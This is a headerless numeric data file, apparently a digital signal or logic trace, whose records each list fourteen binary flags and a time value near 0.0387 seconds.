1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653656e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653680e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653732e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653756e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653804e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653828e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653884e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653908e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654032e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654056e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654236e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654256e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654280e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654308e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654332e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654356e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654380e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654436e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654456e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654480e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654580e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654588e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654604e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654628e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654656e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654684e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654708e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654732e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8654756e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8654784e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654788e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654808e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654836e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654860e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8654932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8654956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655008e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655036e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655084e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655108e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655184e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655236e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655260e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655384e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655408e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655436e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655460e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655484e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655532e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655584e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655608e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655636e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655660e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655708e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655784e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655808e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655836e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655860e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655884e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655908e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655932e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8655956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8655984e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656008e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656036e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656060e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656084e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656108e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656132e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656184e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656208e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656236e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656260e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656284e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656384e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656408e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656436e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656456e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656480e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8656508e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8656532e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8781076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8781260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781284e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,3.8781300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781736e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781760e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8781860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8781884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8781908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8781936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8781960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8781988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782112e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782136e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782160e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782188e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782212e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782236e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782260e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782312e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782336e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782360e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782412e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782460e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782484e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782508e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782536e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782560e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782660e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782712e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782736e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782912e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782936e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8782960e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8782988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783012e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783036e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783060e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783088e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783116e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783140e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783164e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783188e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783212e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783236e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783264e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783288e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783316e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783340e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783412e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783436e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783464e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783488e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783516e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783540e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783564e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783588e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783612e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783636e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783664e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783688e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783716e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783740e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783812e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783892e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783940e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8783964e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8783992e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784016e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784040e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784044e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784068e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784092e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784116e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784140e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784164e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784188e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784216e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784240e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784268e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784292e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8784316e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8784340e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784348e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784416e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784444e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784468e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784492e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784516e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784540e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784564e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784592e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784616e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784640e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784668e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784692e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784716e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784740e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784788e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784816e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784840e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784892e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784940e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8784964e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8784992e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785016e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785044e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785068e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785092e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785116e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785140e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785164e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785192e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785216e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785240e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785268e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785292e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785316e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785340e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785388e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785416e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785444e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785468e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785492e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785516e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785540e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785564e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785592e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785616e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785644e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785668e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785692e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8785716e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8785740e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785748e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785792e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785816e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785840e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785892e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785940e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8785964e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8785988e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786016e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786044e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786068e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786092e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786116e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786140e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786164e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786192e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786216e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786244e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786268e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786292e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786316e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786340e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786392e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786416e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786440e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786468e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786492e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786496e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786516e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786540e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786564e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786592e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786616e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786644e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786668e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786692e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786716e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786740e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.8786764e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.8786792e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786796e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786816e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786844e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786892e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786940e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8786964e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8786992e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787016e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787040e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787068e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787092e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787116e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787140e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787164e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787192e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787216e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787244e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787268e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787292e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787316e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787340e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787364e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787392e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787416e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787444e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787468e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787492e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787516e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787540e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787564e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787592e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787616e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787644e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787668e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787692e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787716e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787740e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787764e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787792e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787816e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787844e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787868e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787908e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787932e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8787956e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8787984e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8788004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8912980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913176e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,3.8913204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913516e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913540e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913564e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913588e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913612e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913636e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913664e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913688e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913716e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913740e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.8913764e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.8913788e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8913812e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8913836e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8913864e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8913888e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8913916e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8913940e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8913964e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8913988e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914012e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914036e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914064e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.8914088e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.8914116e-02 